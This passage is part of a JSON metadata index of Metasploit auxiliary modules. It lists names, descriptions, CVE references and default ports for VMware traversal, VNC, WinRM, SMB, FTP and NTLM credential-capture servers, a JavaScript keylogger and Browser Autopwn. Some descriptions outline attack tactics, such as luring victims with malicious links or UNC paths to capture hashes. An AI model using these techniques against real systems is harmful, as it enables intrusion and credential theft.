"description": "This modules exploits the VMware Server Directory Traversal\n vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before\n 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5\n allows remote attackers to read arbitrary files. Common VMware server ports\n 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out\n the gueststealer tool.",
"references": [
"URL-http://www.vmware.com/security/advisories/VMSA-2009-0015.html",
"OSVDB-59440",
"BID-36842",
"CVE-2009-3733",
"URL-http://fyrmassociates.com/tools/gueststealer-v1.1.pl"
],
"platform": "",
"arch": "",
"rport": 8222,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_server_dir_trav",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_update_manager_traversal": {
"name": "VMWare Update Manager 4 Directory Traversal",
"full_name": "auxiliary/scanner/vmware/vmware_update_manager_traversal",
"rank": 300,
"disclosure_date": "2011-11-21",
"type": "auxiliary",
"author": [
"Alexey Sintsov",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This modules exploits a directory traversal vulnerability in VMWare Update Manager\n on port 9084. Versions affected by this vulnerability: vCenter Update Manager\n 4.1 prior to Update 2, vCenter Update Manager 4 Update 4.",
"references": [
"CVE-2011-4404",
"EDB-18138",
"URL-http://www.vmware.com/security/advisories/VMSA-2011-0014.html",
"URL-http://dsecrg.com/pages/vul/show.php?id=342"
],
"platform": "",
"arch": "",
"rport": 9084,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_update_manager_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vnc/ard_root_pw": {
"name": "Apple Remote Desktop Root Vulnerability",
"full_name": "auxiliary/scanner/vnc/ard_root_pw",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jgor"
],
"description": "Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.",
"references": [
"CVE-2017-13872",
"URL-https://support.apple.com/en-us/HT208315"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-05 10:12:13 +0000",
"path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb",
"is_install_path": true,
"ref_name": "scanner/vnc/ard_root_pw",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vnc/vnc_login": {
"name": "VNC Authentication Scanner",
"full_name": "auxiliary/scanner/vnc/vnc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"carstein <carstein.sec@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module will test a VNC server on a range of machines and\n report successful logins. Currently it supports RFB protocol\n version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response\n authentication method.",
"references": [
"CVE-1999-0506"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
5900,
5901,
5902,
5903,
5904,
5905,
5906,
5907,
5908,
5909,
5910
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
"is_install_path": true,
"ref_name": "scanner/vnc/vnc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vnc/vnc_none_auth": {
"name": "VNC Authentication None Detection",
"full_name": "auxiliary/scanner/vnc/vnc_none_auth",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"jduck <jduck@metasploit.com>"
],
"description": "Detect VNC servers that support the \"None\" authentication method.",
"references": [
"CVE-2006-2369",
"URL-http://en.wikipedia.org/wiki/RFB",
"URL-http://en.wikipedia.org/wiki/Vnc"
],
"platform": "",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb",
"is_install_path": true,
"ref_name": "scanner/vnc/vnc_none_auth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/voice/recorder": {
"name": "Telephone Line Voice Scanner",
"full_name": "auxiliary/scanner/voice/recorder",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module dials a range of phone numbers and records audio from each answered call",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/voice/recorder.rb",
"is_install_path": true,
"ref_name": "scanner/voice/recorder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vxworks/wdbrpc_bootline": {
"name": "VxWorks WDB Agent Boot Parameter Scanner",
"full_name": "auxiliary/scanner/vxworks/wdbrpc_bootline",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for exposed VxWorks wdbrpc daemons and dump the boot parameters from memory",
"references": [
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb",
"is_install_path": true,
"ref_name": "scanner/vxworks/wdbrpc_bootline",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vxworks/wdbrpc_version": {
"name": "VxWorks WDB Agent Version Scanner",
"full_name": "auxiliary/scanner/vxworks/wdbrpc_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Scan for exposed VxWorks wdbrpc daemons",
"references": [
"URL-http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html",
"US-CERT-VU-362332"
],
"platform": "",
"arch": "",
"rport": 17185,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb",
"is_install_path": true,
"ref_name": "scanner/vxworks/wdbrpc_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_auth_methods": {
"name": "WinRM Authentication Method Detection",
"full_name": "auxiliary/scanner/winrm/winrm_auth_methods",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.\n If it is a WinRM service, it also gathers the Authentication Methods supported.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_auth_methods",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_cmd": {
"name": "WinRM Command Runner",
"full_name": "auxiliary/scanner/winrm/winrm_cmd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module runs arbitrary Windows commands using the WinRM Service",
"references": [
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2019-02-28 15:03:04 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_cmd",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_login": {
"name": "WinRM Login Utility",
"full_name": "auxiliary/scanner/winrm/winrm_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module attempts to authenticate to a WinRM service. It currently\n works only if the remote end allows Negotiate(NTLM) authentication.\n Kerberos is not currently supported. Please note: in order to use this\n module without SSL, the 'AllowUnencrypted' winrm option must be set.\n Otherwise adjust the port and set the SSL options in the module as appropriate.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/winrm/winrm_wql": {
"name": "WinRM WQL Query Runner",
"full_name": "auxiliary/scanner/winrm/winrm_wql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"thelightcosine"
],
"description": "This module runs WQL queries against remote WinRM Services.\n Authentication is required. Currently only works with NTLM auth.\n Please note in order to use this module, the 'AllowUnencrypted'\n winrm option must be set.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5985,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
5985,
5986
],
"autofilter_services": [
"http",
"https",
"winrm"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_wql",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/wproxy/att_open_proxy": {
"name": "Open WAN-to-LAN proxy on AT&T routers",
"full_name": "auxiliary/scanner/wproxy/att_open_proxy",
"rank": 300,
"disclosure_date": "2017-08-31",
"type": "auxiliary",
"author": [
"Joseph HutchinsJon Hart <jon_hart[AT]rapid7.com>",
"Adam Cammack <adam_cammack[AT]rapid7.com>"
],
"description": "The Arris NVG589 and NVG599 routers configured with AT&T U-verse\n firmware 9.2.2h0d83 expose an un-authenticated proxy that allows\n connecting from WAN to LAN by MAC address.",
"references": [
"CVE-2017-14117",
"URL-https://www.nomotion.net/blog/sharknatto/",
"URL-https://blog.rapid7.com/2017/09/07/measuring-sharknat-to-exposures/#vulnerability5port49152tcpexposure"
],
"platform": "",
"arch": "",
"rport": 49152,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py",
"is_install_path": true,
"ref_name": "scanner/wproxy/att_open_proxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"SharknAT&To",
"sharknatto"
]
}
},
"auxiliary_scanner/wsdd/wsdd_query": {
"name": "WS-Discovery Information Discovery",
"full_name": "auxiliary/scanner/wsdd/wsdd_query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "Discover information from Web Services Dynamic Discovery (WS-Discovery)\n enabled systems.",
"references": [
"URL-https://msdn.microsoft.com/en-us/library/windows/desktop/bb513684(v=vs.85).aspx",
"URL-http://specs.xmlsoap.org/ws/2005/04/discovery/ws-discovery.pd",
"URL-https://en.wikipedia.org/wiki/Web_Services_for_Devices",
"URL-https://en.wikipedia.org/wiki/WS-Discovery",
"URL-https://en.wikipedia.org/wiki/Zero-configuration_networking#WS-Discovery"
],
"platform": "",
"arch": "",
"rport": 3702,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb",
"is_install_path": true,
"ref_name": "scanner/wsdd/wsdd_query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/x11/open_x11": {
"name": "X11 No-Auth Scanner",
"full_name": "auxiliary/scanner/x11/open_x11",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebodell@gmail.com>"
],
"description": "This module scans for X11 servers that allow anyone\n to connect without authentication.",
"references": [
"OSVDB-309",
"CVE-1999-0526"
],
"platform": "",
"arch": "",
"rport": 6000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/x11/open_x11.rb",
"is_install_path": true,
"ref_name": "scanner/x11/open_x11",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/android_browsable_msf_launch": {
"name": "Android Meterpreter Browsable Launcher",
"full_name": "auxiliary/server/android_browsable_msf_launch",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to open an android meterpreter via a browser. An Android\n meterpreter must be installed as an application beforehand on the target device\n in order to use this.\n\n For best results, you can consider using the auxiliary/client/sms/send_text to\n trick your target into opening the malicious link, and wake up Meterpreter.",
"references": [
"URL-http://developer.android.com/reference/android/content/Intent.html#CATEGORY_BROWSABLE"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/android_browsable_msf_launch.rb",
"is_install_path": true,
"ref_name": "server/android_browsable_msf_launch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/android_mercury_parseuri": {
"name": "Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability",
"full_name": "auxiliary/server/android_mercury_parseuri",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rotlogix",
"sinn3r <sinn3r@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "This module exploits an unsafe intent URI scheme and directory traversal found in\n Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a\n private wifi manager activity, which starts a web server for Mercury on port 8888.\n The webserver also suffers a directory traversal that allows remote access to\n sensitive files.\n\n By default, this module will go after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db,\n webview.db, and bookmarks.db. But if this isn't enough, you can also specify the\n ADDITIONAL_FILES datastore option to collect more files.",
"references": [
"URL-http://rotlogix.com/2015/08/23/exploiting-the-mercury-browser-for-android/",
"URL-http://versprite.com/og/multiple-vulnerabilities-in-mercury-browser-for-android-version-3-0-0/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/android_mercury_parseuri.rb",
"is_install_path": true,
"ref_name": "server/android_mercury_parseuri",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/browser_autopwn": {
"name": "HTTP Client Automatic Exploiter",
"full_name": "auxiliary/server/browser_autopwn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "This module has three actions. The first (and the default)\n is 'WebServer' which uses a combination of client-side and\n server-side techniques to fingerprint HTTP clients and then\n automatically exploit them. Next is 'DefangedDetection' which\n does only the fingerprinting part. Lastly, 'list' simply\n prints the names of all exploit modules that would be used by\n the WebServer action given the current MATCH and EXCLUDE\n options.\n\n Also adds a 'list' command which is the same as running with\n ACTION=list.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/browser_autopwn.rb",
"is_install_path": true,
"ref_name": "server/browser_autopwn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/browser_autopwn2": {
"name": "HTTP Client Automatic Exploiter 2 (Browser Autopwn)",
"full_name": "auxiliary/server/browser_autopwn2",
"rank": 300,
"disclosure_date": "2015-07-05",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will automatically serve browser exploits. Here are the options you can\n configure:\n\n The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,\n if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.\n\n The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash\n exploits, you can set this. Also note that the Exclude option will always be evaluated\n after the Include option.\n\n The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.\n By default, 20 will be loaded. But note that the client will probably not be vulnerable\n to all 20 of them, so only some will actually be served to the client.\n\n The HTMLContent option allows you to provide a basic webpage. This is what the user behind\n the vulnerable browser will see. You can simply set a string, or you can do the file://\n syntax to load an HTML file. Note this option might break exploits so try to keep it\n as simple as possible.\n\n The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to\n get. The default -1 means unlimited. Combining this with other options such as RealList\n and Custom404, you can get information about which visitors (IPs) clicked on your malicious\n link, what exploits they might be vulnerable to, redirect them to your own internal\n training website without actually attacking them.\n\n For more information about Browser Autopwn, please see the referenced blog post.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/server/browser_autopwn2.rb",
"is_install_path": true,
"ref_name": "server/browser_autopwn2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/drda": {
"name": "Authentication Capture: DRDA (DB2, Informix, Derby)",
"full_name": "auxiliary/server/capture/drda",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake DRDA (DB2, Informix, Derby) server\n that is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/capture/drda.rb",
"is_install_path": true,
"ref_name": "server/capture/drda",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/ftp": {
"name": "Authentication Capture: FTP",
"full_name": "auxiliary/server/capture/ftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake FTP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-04 21:46:01 +0000",
"path": "/modules/auxiliary/server/capture/ftp.rb",
"is_install_path": true,
"ref_name": "server/capture/ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http": {
"name": "Authentication Capture: HTTP",
"full_name": "auxiliary/server/capture/http",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake HTTP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/http.rb",
"is_install_path": true,
"ref_name": "server/capture/http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http_basic": {
"name": "HTTP Client Basic Authentication Credential Collector",
"full_name": "auxiliary/server/capture/http_basic",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"saint patrick <saintpatrick@l1pht.com>"
],
"description": "This module responds to all requests for resources with a HTTP 401. This should\n cause most browsers to prompt for a credential. If the user enters Basic Auth creds\n they are sent to the console.\n\n This may be helpful in some phishing expeditions where it is possible to embed a\n resource into a page.\n\n This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-08 21:23:27 +0000",
"path": "/modules/auxiliary/server/capture/http_basic.rb",
"is_install_path": true,
"ref_name": "server/capture/http_basic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http_javascript_keylogger": {
"name": "Capture: HTTP JavaScript Keylogger",
"full_name": "auxiliary/server/capture/http_javascript_keylogger",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Marcus J. Carey <mjc@threatagent.com>",
"hdm <x@hdm.io>"
],
"description": "This modules runs a web server that demonstrates keystroke\n logging through JavaScript. The DEMO option can be set to enable\n a page that demonstrates this technique. Future improvements will\n allow for a configurable template to be used with this module.\n To use this module with an existing web page, simply add a\n script source tag pointing to the URL of this service ending\n in the .js extension. For example, if URIPATH is set to \"test\",\n the following URL will load this script into the calling site:\n http://server:port/test/anything.js",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/http_javascript_keylogger.rb",
"is_install_path": true,
"ref_name": "server/capture/http_javascript_keylogger",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/http_ntlm": {
"name": "HTTP Client MS Credential Catcher",
"full_name": "auxiliary/server/capture/http_ntlm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ryan Linn <sussurro@happypacket.net>"
],
"description": "This module attempts to quietly catch NTLM/LM Challenge hashes.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/capture/http_ntlm.rb",
"is_install_path": true,
"ref_name": "server/capture/http_ntlm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/imap": {
"name": "Authentication Capture: IMAP",
"full_name": "auxiliary/server/capture/imap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake IMAP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-08 21:23:27 +0000",
"path": "/modules/auxiliary/server/capture/imap.rb",
"is_install_path": true,
"ref_name": "server/capture/imap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/mssql": {
"name": "Authentication Capture: MSSQL",
"full_name": "auxiliary/server/capture/mssql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake MSSQL service that\n is designed to capture authentication credentials. The modules\n supports both the weak encoded database logins as well as Windows\n logins (NTLM).",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/mssql.rb",
"is_install_path": true,
"ref_name": "server/capture/mssql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/mysql": {
"name": "Authentication Capture: MySQL",
"full_name": "auxiliary/server/capture/mysql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake MySQL service that is designed to\n capture authentication credentials. It captures\tchallenge and\n response pairs that can be supplied to Cain or JtR for cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-09 18:32:21 +0000",
"path": "/modules/auxiliary/server/capture/mysql.rb",
"is_install_path": true,
"ref_name": "server/capture/mysql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/pop3": {
"name": "Authentication Capture: POP3",
"full_name": "auxiliary/server/capture/pop3",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake POP3 service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/pop3.rb",
"is_install_path": true,
"ref_name": "server/capture/pop3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/postgresql": {
"name": "Authentication Capture: PostgreSQL",
"full_name": "auxiliary/server/capture/postgresql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dhiru Kholia <dhiru@openwall.com>"
],
"description": "This module provides a fake PostgreSQL service that is designed to\n capture clear-text authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/postgresql.rb",
"is_install_path": true,
"ref_name": "server/capture/postgresql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/printjob_capture": {
"name": "Printjob Capture Service",
"full_name": "auxiliary/server/capture/printjob_capture",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"todb <todb@metasploit.com>"
],
"description": "This module is designed to listen for PJL or PostScript print\n jobs. Once a print job is detected it is saved to loot. The\n captured printjob can then be forwarded on to another printer\n (required for LPR printjobs). Resulting PCL/PS files can be\n read with GhostScript/GhostPCL.\n\n Note, this module does not yet support IPP connections.",
"references": [
"URL-http://blog.c22.cc/toolsscripts/prn-2-me/",
"URL-http://www.ghostscript.com"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/server/capture/printjob_capture.rb",
"is_install_path": true,
"ref_name": "server/capture/printjob_capture",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/sip": {
"name": "Authentication Capture: SIP",
"full_name": "auxiliary/server/capture/sip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake SIP service that is designed to\n capture authentication credentials. It captures\tchallenge and\n response pairs that can be supplied to Cain or JtR for cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/capture/sip.rb",
"is_install_path": true,
"ref_name": "server/capture/sip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/smb": {
"name": "Authentication Capture: SMB",
"full_name": "auxiliary/server/capture/smb",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides a SMB service that can be used to capture the\n challenge-response password hashes of SMB client systems. Responses\n sent by this service have by default the configurable challenge string\n (\\x11\\x22\\x33\\x44\\x55\\x66\\x77\\x88), allowing for easy cracking using\n Cain & Abel, L0phtcrack or John the ripper (with jumbo patch).\n\n To exploit this, the target system must try to authenticate to this\n module. One way to force an SMB authentication attempt is by embedding\n a UNC path (\\\\SERVER\\SHARE) into a web page or email message. When\n the victim views the web page or email, their system will\n automatically connect to the server specified in the UNC share (the IP\n address of the system running this module) and attempt to\n authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to\n respond to queries for names the victim is already looking for.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/capture/smb.rb",
"is_install_path": true,
"ref_name": "server/capture/smb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/smtp": {
"name": "Authentication Capture: SMTP",
"full_name": "auxiliary/server/capture/smtp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake SMTP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
